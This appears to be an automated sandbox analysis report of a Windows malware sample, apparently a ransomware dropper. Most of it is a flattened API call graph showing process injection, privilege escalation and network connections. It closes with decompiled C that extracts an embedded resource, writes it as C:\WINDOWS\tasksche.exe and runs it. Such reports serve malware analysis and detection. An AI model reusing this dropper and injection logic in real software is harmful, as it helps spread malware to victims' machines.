7478->7487 7479 ac42d0 SetEvent 7479->7487 7481 ac42b7 closesocket 7480->7481 7480->7487 7481->7487 7482 ac42f2 Sleep ResetEvent 7482->7487 7483 ac40ef GetVersionExA 7483->7487 7484 ac4172 wsprintfA 7484->7487 7485 ac41a7 CreateThread CloseHandle 7485->7487 7486 ac41f6 GetTickCount 7486->7487 7487->7471 7487->7476 7487->7477 7487->7478 7487->7479 7487->7481 7487->7482 7487->7483 7487->7484 7487->7485 7487->7486 7488 ac4288 Sleep 7487->7488 7488->7487 7489 ac4294 GetTickCount 7488->7489 7489->7487 7491 ac3d7d 7490->7491 7492 ac10ce 2 API calls 7490->7492 7493 ac3d92 GetTickCount 7491->7493 7492->7491 7494 ac3daa 7493->7494 7495 ac3e47 GetVolumeInformationA 7494->7495 7496 ac3e7a 7495->7496 7497 ac3f25 7496->7497 7498 ac3eb5 96 API calls 7496->7498 7500 ac3f4f 7497->7500 7501 ac3f31 CreateThread CloseHandle 7497->7501 7499 ac3ea9 7498->7499 7499->7497 7502 ac3f14 7499->7502 7504 ac3eca GetModuleFileNameA wsprintfA 7499->7504 7503 ac3f60 43 API calls 7500->7503 7501->7500 7502->7497 7506 ac3405 5 API calls 7502->7506 7505 ac3f54 7503->7505 7504->7502 7507 ac10ce 2 API calls 7505->7507 7506->7497 7508 ac3f7e 7507->7508 7509 ac3f8f 23 API calls 7508->7509 7510 ac3f83 7509->7510 7511 ac3ffa CreateEventA 7510->7511 7512 ac3fd3 CreateThread CloseHandle 7510->7512 7515 ac4012 7511->7515 7512->7511 7513 ac4065 gethostbyname 7513->7515 7514 ac4056 lstrlen 7514->7513 7514->7514 7515->7513 7515->7514 7516 ac4081 socket 7515->7516 7517 ac4320 RtlExitUserThread 7515->7517 7518 ac42d0 SetEvent 7515->7518 7520 ac42b7 closesocket 7515->7520 7521 ac42f2 Sleep ResetEvent 7515->7521 7522 ac40ef GetVersionExA 7515->7522 7523 ac4172 wsprintfA 7515->7523 7524 ac41a7 CreateThread CloseHandle 7515->7524 7525 ac41f6 GetTickCount 7515->7525 7526 ac4288 Sleep 7515->7526 7516->7515 7519 ac40a6 connect 7516->7519 7518->7515 7519->7515 7519->7520 7520->7515 7521->7515 7522->7515 7523->7515 7524->7515 7525->7515 7526->7515 7527 ac4294 GetTickCount 7526->7527 7527->7515 6417 7fea33e0 6418 7fea344e 6417->6418 6419 7fea33e5 6417->6419 6420 7fea345f NtQuerySystemInformation 6418->6420 6425 7fea35f3 6418->6425 6421 7fea346f MapViewOfFile CloseHandle 6419->6421 6422 7fea3440 NtOpenSection 6419->6422 6420->6421 6424 7fea34b0 6421->6424 6421->6425 6422->6418 6423 7fea34b7 UnmapViewOfFile 6423->6425 6424->6423 6424->6425 7528 7fea6620 7529 7fea6647 5 API calls 7528->7529 7530 7fea662a 7529->7530 6550 ac33e0 6551 ac33e5 6550->6551 6552 ac346f MapViewOfFile CloseHandle 6551->6552 6553 ac3440 NtOpenSection 6551->6553 6556 ac34b0 6552->6556 6557 ac35f3 6552->6557 6555 ac345f NtQuerySystemInformation 6553->6555 6553->6557 6554 ac34b7 UnmapViewOfFile 6554->6557 6555->6552 6556->6554 6556->6557 6733 ac6620 6734 ac6647 5 API calls 6733->6734 6735 ac662a 6734->6735 6736 ac1422 LookupPrivilegeValueA NtAdjustPrivilegesToken 7531 ac2762 7533 ac2768 7531->7533 7534 ac2839 InternetCloseHandle 7533->7534 7535 ac2780 GetTempPathA 7533->7535 7543 ac27a7 GetTempFileNameA CreateFileA 7535->7543 7537 ac27a3 CreateFileA 7538 ac27ce InternetReadFile 7537->7538 7539 ac2829 InternetCloseHandle 7537->7539 7540 ac27fe CloseHandle CreateProcessA 7538->7540 7541 ac27e8 7538->7541 7539->7534 7540->7539 7541->7540 7542 ac27ea WriteFile 7541->7542 7542->7538 7542->7540 7544 ac27ce InternetReadFile 7543->7544 7545 ac2829 InternetCloseHandle 7543->7545 7546 ac27fe CloseHandle CreateProcessA 7544->7546 7547 ac27e8 7544->7547 7548 ac2839 InternetCloseHandle 7545->7548 7546->7545 7547->7546 7549 ac27ea WriteFile 7547->7549 7548->7537 7549->7544 7549->7546 6737 7fea2665 6739 7fea266b CreateThread CloseHandle 6737->6739 6740 7fea3c38 6739->6740 6742 7fea3c3d 6740->6742 6743 7fea3ca9 6742->6743 6746 7fea3c5b GetWindowsDirectoryA 6742->6746 6797 7fea252f NtOpenSection 6743->6797 6745 7fea3cae 6748 7fea3cfb GetSystemDirectoryA 6745->6748 6749 7fea3cb5 6745->6749 6751 7fea3d26 6746->6751 6842 7fea3d1f lstrcat 6748->6842 6798 7fea3cc2 GetModuleHandleA 6749->6798 6884 7fea3d36 LoadLibraryA 6751->6884 6797->6745 6799 7fea3ccc 6798->6799 6800 7fea3cde 6798->6800 6802 7fea3cd4 GetProcAddress 6799->6802 6925 7fea3cf0 GetModuleHandleA 6800->6925 6802->6800 6843 7fea3d26 6842->6843 6844 7fea3d36 151 API calls 6843->6844 6845 7fea3d2b GetProcAddress LoadLibraryA 6844->6845 6847 7fea3d7d 6845->6847 6848 7fea10ce 2 API calls 6845->6848 6849 7fea3d92 GetTickCount 6847->6849 6848->6847 6850 7fea3daa 6849->6850 6851 7fea3e47 GetVolumeInformationA 6850->6851 6852 7fea3e7a 6851->6852 6853 7fea3f25 6852->6853 6854 7fea3eb5 96 API calls 6852->6854 6856 7fea3f4f 6853->6856 6857 7fea3f31 CreateThread CloseHandle 6853->6857 6855 7fea3ea9 6854->6855 6855->6853 6860 7fea3eca GetModuleFileNameA wsprintfA 6855->6860 6858 7fea3f60 43 API calls 6856->6858 6857->6856 6859 7fea3f54 6858->6859 6861 7fea3f7e 6859->6861 6862 7fea10ce 2 API calls 6859->6862 6863 7fea3f14 6860->6863 6864 7fea3f8f 23 API calls 6861->6864 6862->6861 6863->6853 6866 7fea3405 5 API calls 6863->6866 6865 7fea3f83 6864->6865 6867 7fea3fd6 CreateThread CloseHandle 6865->6867 6868 7fea3ffa CreateEventA 6865->6868 6866->6853 6867->6868 6879 7fea4012 6868->6879 6869 7fea4056 lstrlen 6869->6869 6870 7fea4065 gethostbyname 6869->6870 6870->6879 6871 7fea4320 RtlExitUserThread 6872 7fea4081 socket 6873 7fea40a6 connect 6872->6873 6872->6879 6875 7fea42b7 closesocket 6873->6875 6873->6879 6874 7fea42d0 SetEvent 6874->6879 6875->6879 6876 7fea42f2 Sleep ResetEvent 6876->6879 6877 7fea40ef GetVersionExA 6877->6879 6878 7fea4172 wsprintfA 6878->6879 6879->6869 6879->6870 6879->6871 6879->6872 6879->6874 6879->6875 6879->6876 6879->6877 6879->6878 6880 7fea41a7 CreateThread CloseHandle 6879->6880 6881 7fea41f6 GetTickCount 6879->6881 6882 7fea4288 Sleep 6879->6882 6880->6879 6881->6879 6882->6879 6883 7fea4294 GetTickCount 6882->6883 6883->6879 7083 7fea3d4b GetProcAddress LoadLibraryA 6884->7083 6968 7fea26d4 6925->6968 6928 7fea3d1f 179 API calls 6929 7fea3d12 GetProcAddress LoadLibraryA 6928->6929 6931 7fea10ce 2 API calls 6929->6931 6932 7fea3d7d 6929->6932 6931->6932 6933 7fea3d92 GetTickCount 6932->6933 6934 7fea3daa 6933->6934 6935 7fea3e47 GetVolumeInformationA 6934->6935 6936 7fea3e7a 6935->6936 6937 7fea3f25 6936->6937 6970 7fea3eb5 LoadLibraryA 6936->6970 6940 7fea3f4f 6937->6940 6941 7fea3f31 CreateThread CloseHandle 6937->6941 7002 7fea3f60 LoadLibraryA 6940->7002 6941->6940 6969 7fea26c8 GetSystemDirectoryA 6968->6969 6969->6928 7024 7fea3ecc GetProcAddress GetModuleFileNameA wsprintfA 6970->7024 7003 7fea10ce 2 API calls 7002->7003 7004 7fea3f7e 7003->7004 7005 7fea3f8f 23 API calls 7004->7005 7006 7fea3f83 7005->7006 7007 7fea3fd6 CreateThread CloseHandle 7006->7007 7008 7fea3ffa CreateEventA 7006->7008 7007->7008 7021 7fea4012 7008->7021 7009 7fea4056 lstrlen 7009->7009 7010 7fea4065 gethostbyname 7009->7010 7010->7021 7011 7fea4320 RtlExitUserThread 7012 7fea4081 socket 7013 7fea40a6 connect 7012->7013 7012->7021 7015 7fea42b7 closesocket 7013->7015 7013->7021 7014 7fea42d0 SetEvent 7014->7021 7015->7021 7016 7fea42f2 Sleep ResetEvent 7016->7021 7017 7fea40ef GetVersionExA 7017->7021 7018 7fea4172 wsprintfA 7018->7021 7019 7fea41a7 CreateThread CloseHandle 7019->7021 7020 7fea41f6 GetTickCount 7020->7021 7021->7009 7021->7010 7021->7011 7021->7012 7021->7014 7021->7015 7021->7016 7021->7017 7021->7018 7021->7019 7021->7020 7022 7fea4288 Sleep 7021->7022 7022->7021 7023 7fea4294 GetTickCount 7022->7023 7023->7021 7025 7fea3f14 7024->7025 7026 7fea3f25 7025->7026 7053 7fea3405 7025->7053 7028 7fea3f4f 7026->7028 7029 7fea3f31 CreateThread CloseHandle 7026->7029 7030 7fea3f60 43 API calls 7028->7030 7029->7028 7031 7fea3f54 7030->7031 7032 7fea3f7e 7031->7032 7033 7fea10ce 2 API calls 7031->7033 7062 7fea3f8f LoadLibraryA 7032->7062 7033->7032 7054 7fea343b 7053->7054 7054->7054 7055 7fea3440 NtOpenSection 7054->7055 7056 7fea344e 7055->7056 7057 7fea345f NtQuerySystemInformation 7056->7057 7061 7fea35f3 7056->7061 7058 7fea346f MapViewOfFile CloseHandle 7057->7058 7060 7fea34b0 7058->7060 7058->7061 7059 7fea34b7 UnmapViewOfFile 7059->7061 7060->7059 7060->7061 7061->7026 7063 7fea3f9d 7062->7063 7064 7fea4320 RtlExitUserThread 7062->7064 7065 7fea10ce 2 API calls 7063->7065 7066 7fea3fb5 7065->7066 7066->7064 7067 7fea3fc2 WSAStartup CreateThread CloseHandle 7066->7067 7068 7fea3ffa CreateEventA 7067->7068 7071 7fea4012 7068->7071 7069 7fea4056 lstrlen 7069->7069 7070 7fea4065 gethostbyname 7069->7070 7070->7071 7071->7064 7071->7069 7071->7070 7072 7fea4081 socket 7071->7072 7074 7fea42d0 SetEvent 7071->7074 7075 7fea42b7 closesocket 7071->7075 7076 7fea42f2 Sleep ResetEvent 7071->7076 7077 7fea40ef GetVersionExA 7071->7077 7078 7fea4172 wsprintfA 7071->7078 7079 7fea41a7 CreateThread CloseHandle 7071->7079 7080 7fea41f6 GetTickCount 7071->7080 7081 7fea4288 Sleep 7071->7081 7072->7071 7073 7fea40a6 connect 7072->7073 7073->7071 7073->7075 7074->7071 7075->7071 7076->7071 7077->7071 7078->7071 7079->7071 7080->7071 7081->7071 7082 7fea4294 GetTickCount 7081->7082 7082->7071 7084 7fea10ce 2 API calls 7083->7084 7085 7fea3d7d 7084->7085 7086 7fea3d92 GetTickCount 7085->7086 7087 7fea3daa 7086->7087 7088 7fea3e47 GetVolumeInformationA 7087->7088 7089 7fea3e7a 7088->7089 7090 7fea3f25 7089->7090 7091 7fea3eb5 96 API calls 7089->7091 7093 7fea3f4f 7090->7093 7094 7fea3f31 CreateThread CloseHandle 7090->7094 7092 7fea3ea9 7091->7092 7092->7090 7097 7fea3eca GetModuleFileNameA wsprintfA 7092->7097 7095 7fea3f60 43 API calls 7093->7095 7094->7093 7096 7fea3f54 7095->7096 7098 7fea3f7e 7096->7098 7099 7fea10ce 2 API calls 7096->7099 7100 7fea3f14 7097->7100 7101 7fea3f8f 23 API calls 7098->7101 7099->7098 7100->7090 7103 7fea3405 5 API calls 7100->7103 7102 7fea3f83 7101->7102 7104 7fea3fd6 CreateThread CloseHandle 7102->7104 7105 7fea3ffa CreateEventA 7102->7105 7103->7090 7104->7105 7118 7fea4012 7105->7118 7106 7fea4056 lstrlen 7106->7106 7107 7fea4065 gethostbyname 7106->7107 7107->7118 7108 7fea4320 RtlExitUserThread 7109 7fea4081 socket 7110 7fea40a6 connect 7109->7110 7109->7118 7112 7fea42b7 closesocket 7110->7112 7110->7118 7111 7fea42d0 SetEvent 7111->7118 7112->7118 7113 7fea42f2 Sleep ResetEvent 7113->7118 7114 7fea40ef GetVersionExA 7114->7118 7115 7fea4172 wsprintfA 7115->7118 7116 7fea41a7 CreateThread CloseHandle 7116->7118 7117 7fea41f6 GetTickCount 7117->7118 7118->7106 7118->7107 7118->7108 7118->7109 7118->7111 7118->7112 7118->7113 7118->7114 7118->7115 7118->7116 7118->7117 7119 7fea4288 Sleep 7118->7119 7119->7118 7120 7fea4294 GetTickCount 7119->7120 7120->7118 6310 7fea663a 6313 7fea6647 6310->6313 6314 7fea6644 6313->6314 6315 7fea6652 6313->6315 6317 7fea6658 6315->6317 6320 7fea2574 6317->6320 6339 7fea252f NtOpenSection 6320->6339 6322 7fea257c 6323 7fea2582 NtMapViewOfSection CloseHandle 6322->6323 6324 7fea2661 6322->6324 6323->6324 6326 7fea25ba 6323->6326 6324->6314 6325 7fea25ef 6341 7fea2477 NtProtectVirtualMemory NtWriteVirtualMemory 6325->6341 6326->6325 6340 7fea2477 NtProtectVirtualMemory NtWriteVirtualMemory 6326->6340 6328 7fea2600 6342 7fea2477 NtProtectVirtualMemory NtWriteVirtualMemory 6328->6342 6331 7fea2611 6343 7fea2477 NtProtectVirtualMemory NtWriteVirtualMemory 6331->6343 6333 7fea2622 6334 7fea2637 6333->6334 6344 7fea2477 NtProtectVirtualMemory NtWriteVirtualMemory 6333->6344 6336 7fea264c 6334->6336 6345 7fea2477 NtProtectVirtualMemory NtWriteVirtualMemory 6334->6345 6336->6324 6346 7fea2477 NtProtectVirtualMemory NtWriteVirtualMemory 6336->6346 6339->6322 6340->6325 6341->6328 6342->6331 6343->6333 6344->6334 6345->6336 6346->6324 7550 7fea443b 7553 7fea144a LookupPrivilegeValueA NtAdjustPrivilegesToken 7550->7553 7552 7fea4441 7553->7552 6558 ac02fe 6559 ac0415 6558->6559 6563 ac007c 6559->6563 6561 ac0421 6567 ac042d 6561->6567 6564 ac008d 6563->6564 6565 ac00a1 6564->6565 6596 ac025e 6564->6596 6565->6561 6602 ac10ce 6567->6602 6569 ac048f 6570 ac04dd 6569->6570 6571 ac04b0 GetModuleHandleA 6569->6571 6572 ac04f8 GetVersion 6570->6572 6571->6570 6573 ac050f VirtualAlloc 6572->6573 6588 ac05ca 6572->6588 6574 ac05a9 FindCloseChangeNotification 6573->6574 6577 ac0532 6573->6577 6574->6588 6575 ac05d3 SetProcessAffinityMask 6609 ac05f2 GetModuleHandleA 6575->6609 6577->6574 6606 ac05ba 6577->6606 6578 ac06fc lstrcpyW 6631 ac24ae lstrcpyW lstrlenW 6578->6631 6580 ac074c NtMapViewOfSection 6580->6574 6580->6588 6581 ac0717 GetPEB lstrcpyW lstrcatW 6583 ac24ae 3 API calls 6581->6583 6583->6588 6584 ac0780 NtOpenProcessToken 6585 ac07c5 CreateToolhelp32Snapshot Process32First 6584->6585 6584->6588 6586 ac07eb Process32Next 6585->6586 6587 ac0865 FindCloseChangeNotification 6586->6587 6586->6588 6587->6574 6588->6574 6588->6575 6588->6578 6588->6580 6588->6581 6588->6584 6588->6586 6590 ac07fd OpenProcess 6588->6590 6592 ac07b7 CreateToolhelp32Snapshot Process32First 6588->6592 6593 ac085c FindCloseChangeNotification 6588->6593 6594 ac0834 CreateRemoteThread 6588->6594 6595 ac05ba Sleep 6588->6595 6633 ac07ac 6588->6633 6656 ac2574 6588->6656 6590->6586 6590->6588 6592->6586 6593->6586 6594->6588 6594->6593 6595->6593 6600 ac0105 6596->6600 6598 ac0268 GetPEB 6599 ac0278 6598->6599 6599->6565 6601 ac0116 6600->6601 6601->6598 6601->6601 6604 ac10db 6602->6604 6603 ac115c 6603->6569 6604->6602 6604->6603 6605 ac1133 GetModuleHandleA GetProcAddress 6604->6605 6605->6604 6607 ac05bf Sleep 6606->6607 6608 ac05c9 6606->6608 6607->6606 6608->6574 6610 ac10ce 2 API calls 6609->6610 6623 ac05ca 6610->6623 6611 ac05a9 FindCloseChangeNotification 6611->6623 6612 ac05d3 SetProcessAffinityMask 6613 ac05f2 30 API calls 6612->6613 6613->6623 6614 ac06fc lstrcpyW 6615 ac24ae 3 API calls 6614->6615 6615->6623 6616 ac074c NtMapViewOfSection 6616->6611 6616->6623 6617 ac0717 GetPEB lstrcpyW lstrcatW 6618 ac24ae 3 API calls 6617->6618 6618->6623 6619 ac0780 NtOpenProcessToken 6620 ac07c5 CreateToolhelp32Snapshot Process32First 6619->6620 6619->6623 6621 ac07eb Process32Next 6620->6621 6622 ac0865 FindCloseChangeNotification 6621->6622 6621->6623 6622->6611 6623->6611 6623->6612 6623->6614 6623->6616 6623->6617 6623->6619 6623->6621 6624 ac07ac 30 API calls 6623->6624 6625 ac07fd OpenProcess 6623->6625 6626 ac2574 5 API calls 6623->6626 6627 ac07b7 CreateToolhelp32Snapshot Process32First 6623->6627 6628 ac085c FindCloseChangeNotification 6623->6628 6629 ac0834 CreateRemoteThread 6623->6629 6630 ac05ba Sleep 6623->6630 6624->6623 6625->6621 6625->6623 6626->6623 6627->6621 6628->6621 6629->6623 6629->6628 6630->6628 6632 ac24ea NtCreateSection 6631->6632 6632->6588 6675 ac144a LookupPrivilegeValueA NtAdjustPrivilegesToken 6633->6675 6635 ac07b2 FreeLibrary FindCloseChangeNotification 6636 ac07c5 CreateToolhelp32Snapshot Process32First 6635->6636 6637 ac07eb Process32Next 6636->6637 6638 ac0865 FindCloseChangeNotification 6637->6638 6646 ac05ca 6637->6646 6639 ac05a9 FindCloseChangeNotification 6638->6639 6639->6646 6640 ac07fd OpenProcess 6640->6637 6640->6646 6641 ac2574 5 API calls 6641->6646 6642 ac05d3 SetProcessAffinityMask 6643 ac05f2 29 API calls 6642->6643 6643->6646 6644 ac085c FindCloseChangeNotification 6644->6637 6645 ac0834 CreateRemoteThread 6645->6644 6645->6646 6646->6637 6646->6639 6646->6640 6646->6641 6646->6642 6646->6644 6646->6645 6647 ac05ba Sleep 6646->6647 6648 ac06fc lstrcpyW 6646->6648 6650 ac074c NtMapViewOfSection 6646->6650 6651 ac0717 GetPEB lstrcpyW lstrcatW 6646->6651 6653 ac0780 NtOpenProcessToken 6646->6653 6654 ac07ac 29 API calls 6646->6654 6655 ac07b7 CreateToolhelp32Snapshot Process32First 6646->6655 6647->6644 6649 ac24ae 3 API calls 6648->6649 6649->6646 6650->6639 6650->6646 6652 ac24ae 3 API calls 6651->6652 6652->6646 6653->6636 6653->6646 6654->6646 6655->6637 6676 ac252f NtOpenSection 6656->6676 6658 ac257c 6659 ac2661 6658->6659 6660 ac2582 NtMapViewOfSection FindCloseChangeNotification 6658->6660 6659->6588 6660->6659 6663 ac25ba 6660->6663 6661 ac25ef 6678 ac2477 NtProtectVirtualMemory NtWriteVirtualMemory 6661->6678 6663->6661 6677 ac2477 NtProtectVirtualMemory NtWriteVirtualMemory 6663->6677 6665 ac2600 6679 ac2477 NtProtectVirtualMemory NtWriteVirtualMemory 6665->6679 6667 ac2611 6680 ac2477 NtProtectVirtualMemory NtWriteVirtualMemory 6667->6680 6669 ac2622 6670 ac2637 6669->6670 6681 ac2477 NtProtectVirtualMemory NtWriteVirtualMemory 6669->6681 6672 ac264c 6670->6672 6682 ac2477 NtProtectVirtualMemory NtWriteVirtualMemory 6670->6682 6672->6659 6683 ac2477 NtProtectVirtualMemory NtWriteVirtualMemory 6672->6683 6675->6635 6676->6658 6677->6661 6678->6665 6679->6667 6680->6669 6681->6670 6682->6672 6683->6659 6426 7fea02fe 6427 7fea0415 6426->6427 6431 7fea007c 6427->6431 6429 7fea0421 6435 7fea042d 6429->6435 6432 7fea008d 6431->6432 6434 7fea00a1 6432->6434 6466 7fea025e 6432->6466 6434->6429 6472 7fea10ce 6435->6472 6437 7fea048f 6438 7fea04dd 6437->6438 6439 7fea04b0 GetModuleHandleA 6437->6439 6440 7fea04f8 GetVersion 6438->6440 6439->6438 6441 7fea05ca 6440->6441 6442 7fea050f VirtualAlloc 6440->6442 6443 7fea05a9 CloseHandle 6441->6443 6444 7fea05d3 SetProcessAffinityMask 6441->6444 6442->6443 6448 7fea0532 6442->6448 6446 7fea05f2 GetModuleHandleA 6443->6446 6479 7fea05f2 GetModuleHandleA 6444->6479 6447 7fea10ce 2 API calls 6446->6447 6464 7fea05ec 6447->6464 6448->6443 6476 7fea05ba 6448->6476 6449 7fea06fc lstrcpyW 6498 7fea24ae lstrcpyW lstrlenW 6449->6498 6451 7fea074c NtMapViewOfSection 6451->6443 6451->6464 6452 7fea0717 GetPEB lstrcpyW lstrcatW 6454 7fea24ae 3 API calls 6452->6454 6454->6464 6455 7fea0780 NtOpenProcessToken 6456 7fea07c5 CreateToolhelp32Snapshot Process32First 6455->6456 6455->6464 6456->6464 6457 7fea07eb Process32Next 6460 7fea0865 CloseHandle 6457->6460 6457->6464 6458 7fea2574 5 API calls 6458->6464 6460->6443 6461 7fea07fd OpenProcess 6461->6457 6461->6464 6462 7fea085c CloseHandle 6462->6457 6463 7fea0834 CreateRemoteThread 6463->6462 6463->6464 6464->6443 6464->6449 6464->6451 6464->6452 6464->6455 6464->6456 6464->6457 6464->6458 6464->6461 6464->6462 6464->6463 6465 7fea05ba Sleep 6464->6465 6500 7fea07ac 6464->6500 6465->6462 6470 7fea0105 6466->6470 6469 7fea0278 6469->6434 6471 7fea0116 GetPEB 6470->6471 6471->6469 6473 7fea10db 6472->6473 6473->6472 6474 7fea115c 6473->6474 6475 7fea1133 GetModuleHandleA GetProcAddress 6473->6475 6474->6437 6475->6473 6477 7fea05c9 6476->6477 6478 7fea05bf Sleep 6476->6478 6477->6443 6478->6476 6480 7fea10ce 2 API calls 6479->6480 6481 7fea060e 6480->6481 6482 7fea05a9 CloseHandle 6481->6482 6483 7fea06fc lstrcpyW 6481->6483 6485 7fea074c NtMapViewOfSection 6481->6485 6486 7fea0717 GetPEB lstrcpyW lstrcatW 6481->6486 6488 7fea0780 NtOpenProcessToken 6481->6488 6489 7fea07c5 CreateToolhelp32Snapshot Process32First 6481->6489 6490 7fea07eb Process32Next 6481->6490 6491 7fea2574 5 API calls 6481->6491 6492 7fea07ac 30 API calls 6481->6492 6494 7fea07fd OpenProcess 6481->6494 6495 7fea085c CloseHandle 6481->6495 6496 7fea0834 CreateRemoteThread 6481->6496 6497 7fea05ba Sleep 6481->6497 6482->6479 6484 7fea24ae 3 API calls 6483->6484 6484->6481 6485->6481 6485->6482 6487 7fea24ae 3 API calls 6486->6487 6487->6481 6488->6481 6488->6489 6489->6481 6490->6481 6493 7fea0865 CloseHandle 6490->6493 6491->6481 6492->6481 6493->6482 6494->6481 6494->6490 6495->6490 6496->6481 6496->6495 6497->6495 6499 7fea24ea NtCreateSection 6498->6499 6499->6464 6522 7fea144a LookupPrivilegeValueA NtAdjustPrivilegesToken 6500->6522 6502 7fea07b2 FreeLibrary CloseHandle 6503 7fea07c5 CreateToolhelp32Snapshot Process32First 6502->6503 6515 7fea060e 6503->6515 6504 7fea07eb Process32Next 6506 7fea0865 CloseHandle 6504->6506 6504->6515 6505 7fea2574 5 API calls 6505->6515 6507 7fea05a9 CloseHandle 6506->6507 6511 7fea05f2 GetModuleHandleA 6507->6511 6508 7fea07fd OpenProcess 6508->6504 6508->6515 6509 7fea085c CloseHandle 6509->6504 6510 7fea0834 CreateRemoteThread 6510->6509 6510->6515 6512 7fea10ce 2 API calls 6511->6512 6512->6515 6513 7fea05ba Sleep 6513->6509 6514 7fea06fc lstrcpyW 6516 7fea24ae 3 API calls 6514->6516 6515->6503 6515->6504 6515->6505 6515->6507 6515->6508 6515->6509 6515->6510 6515->6513 6515->6514 6517 7fea074c NtMapViewOfSection 6515->6517 6518 7fea0717 GetPEB lstrcpyW lstrcatW 6515->6518 6520 7fea0780 NtOpenProcessToken 6515->6520 6521 7fea07ac 13 API calls 6515->6521 6516->6515 6517->6507 6517->6515 6519 7fea24ae 3 API calls 6518->6519 6519->6515 6520->6503 6520->6515 6521->6515 6522->6502 6368 409a16 __set_app_type __p__fmode __p__commode 6369 409a85 6368->6369 6370 409a99 6369->6370 6371 409a8d __setusermatherr 6369->6371 6380 409b8c _controlfp 6370->6380 6371->6370 6373 409a9e _initterm __getmainargs _initterm 6375 409af2 GetStartupInfoA 6373->6375 6376 409b26 GetModuleHandleA 6375->6376 6381 408140 InternetOpenA InternetOpenUrlA InternetCloseHandle InternetCloseHandle 6376->6381 6380->6373 6384 408090 GetModuleFileNameA __p___argc 6381->6384 6383 4081b2 exit _XcptFilter 6385 4080b0 6384->6385 6386 4080b9 OpenSCManagerA 6384->6386 6395 407f20 6385->6395 6387 408101 StartServiceCtrlDispatcherA 6386->6387 6388 4080cf OpenServiceA 6386->6388 6387->6383 6390 4080fc CloseServiceHandle 6388->6390 6391 4080ee 6388->6391 6390->6387 6400 407fa0 ChangeServiceConfig2A 6391->6400 6394 4080f6 CloseServiceHandle 6394->6390 6412 407c40 sprintf OpenSCManagerA 6395->6412 6397 407f25 6401 407ce0 GetModuleHandleW 6397->6401 6400->6394 6402 407d01 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 6401->6402 6403 407f08 6401->6403 6402->6403 6404 407d49 6402->6404 6403->6383 6404->6403 6405 407d69 FindResourceA 6404->6405 6405->6403 6406 407d84 LoadResource 6405->6406 6406->6403 6407 407d94 LockResource 6406->6407 6407->6403 6408 407da7 SizeofResource 6407->6408 6408->6403 6409 407db9 sprintf sprintf MoveFileExA CreateFileA 6408->6409 6409->6403 6410 407e54 WriteFile CloseHandle CreateProcessA 6409->6410 6410->6403 6411 407ef2 CloseHandle CloseHandle 6410->6411 6411->6403 6413 407c74 CreateServiceA 6412->6413 6414 407cca 6412->6414 6415 407cbb CloseServiceHandle 6413->6415 6416 407cad StartServiceA CloseServiceHandle 6413->6416 6414->6397 6415->6397 6416->6415 7124 ac443b 7127 ac144a LookupPrivilegeValueA NtAdjustPrivilegesToken 7124->7127 7126 ac4441 7127->7126 6523 ac3888 6525 ac388e GetSystemTime 6523->6525 6526 ac38d2 6525->6526 6527 ac390c Sleep 6526->6527 6528 ac3924 InternetGetConnectedState 6526->6528 6529 ac3a32 6526->6529 6530 ac3954 gethostbyname 6526->6530 6533 ac3a1f closesocket 6526->6533 6527->6526 6528->6526 6530->6526 6531 ac397a socket 6530->6531 6531->6526 6532 ac3990 ioctlsocket connect Sleep 6531->6532 6532->6526 6533->6526 7128 ac0000 7129 ac0004 7128->7129 7130 ac00a1 7129->7130 7131 ac025e GetPEB 7129->7131 7131->7130 6534 ac3399 6536 ac33a2 6534->6536 6537 ac33a9 Sleep 6536->6537 6537->6537 7132 ac3819 7134 ac381f WaitForSingleObject 7132->7134 7135 ac383b closesocket 7134->7135 7136 ac3845 7134->7136 7135->7136 6699 ac0fd6 6701 ac10a0 6699->6701 6700 ac115c 6701->6700 6702 ac1133 GetModuleHandleA GetProcAddress 6701->6702 6702->6701 6703 7fea1196 GetProcAddress

                                                                                                                                                Executed Functions

                                                                                                                                                Function 00407CE0 Relevance: 50.9, APIs: 18, Strings: 11, Instructions: 175libraryloaderfileCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                			E00407CE0() {
				void _v259;
				char _v260;
				void _v519;
				char _v520;
				struct _STARTUPINFOA _v588;
				struct _PROCESS_INFORMATION _v604;
				long _v608;
				_Unknown_base(*)()* _t36;
				void* _t38;
				void* _t39;
				void* _t50;
				int _t59;
				struct HINSTANCE__* _t104;
				struct HRSRC__* _t105;
				void* _t107;
				void* _t108;
				long _t109;
				intOrPtr _t121;
				intOrPtr _t122;

				_t104 = GetModuleHandleW(L"kernel32.dll");
				if(_t104 != 0) {
					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
					 *0x431460 = GetProcAddress(_t104, "WriteFile");
					_t36 = GetProcAddress(_t104, "CloseHandle");
					 *0x43144c = _t36;
					if( *0x431478 != 0) {
						_t121 =  *0x431458; // 0x7620f7b0
						if(_t121 != 0) {
							_t122 =  *0x431460; // 0x7620fc30
							if(_t122 != 0 && _t36 != 0) {
								_t105 = FindResourceA(0, 0x727, "R");
								if(_t105 != 0) {
									_t38 = LoadResource(0, _t105);
									if(_t38 != 0) {
										_t39 = LockResource(_t38);
										_v608 = _t39;
										if(_t39 != 0) {
											_t109 = SizeofResource(0, _t105);
											if(_t109 != 0) {
												_v520 = 0;
												memset( &_v519, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												_v260 = 0;
												memset( &_v259, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
												MoveFileExA( &_v520,  &_v260, 1); // executed
												_t50 = CreateFileA( &_v520, 0x40000000, 0, 0, 2, 4, 0); // executed
												_t107 = _t50;
												if(_t107 != 0xffffffff) {
													WriteFile(_t107, _v608, _t109,  &_v608, 0); // executed
													CloseHandle(_t107);
													_v604.hThread = 0;
													_v604.dwProcessId = 0;
													_v604.dwThreadId = 0;
													memset( &(_v588.lpReserved), 0, 0x10 << 2);
													asm("repne scasb");
													_v604.hProcess = 0;
													_t108 = " /i";
													asm("repne scasb");
													memcpy( &_v520 - 1, _t108, 0 << 2);
													memcpy(_t108 + 0x175b75a, _t108, 0);
													_v588.cb = 0x44;
													_v588.wShowWindow = 0;
													_v588.dwFlags = 0x81;
													_t59 = CreateProcessA(0,  &_v520, 0, 0, 0, 0x8000000, 0, 0,  &_v588,  &_v604); // executed
													if(_t59 != 0) {
														CloseHandle(_v604.hThread);
														CloseHandle(_v604);
													}
												}
											}
										}
									}
								}
							}
						}
					}
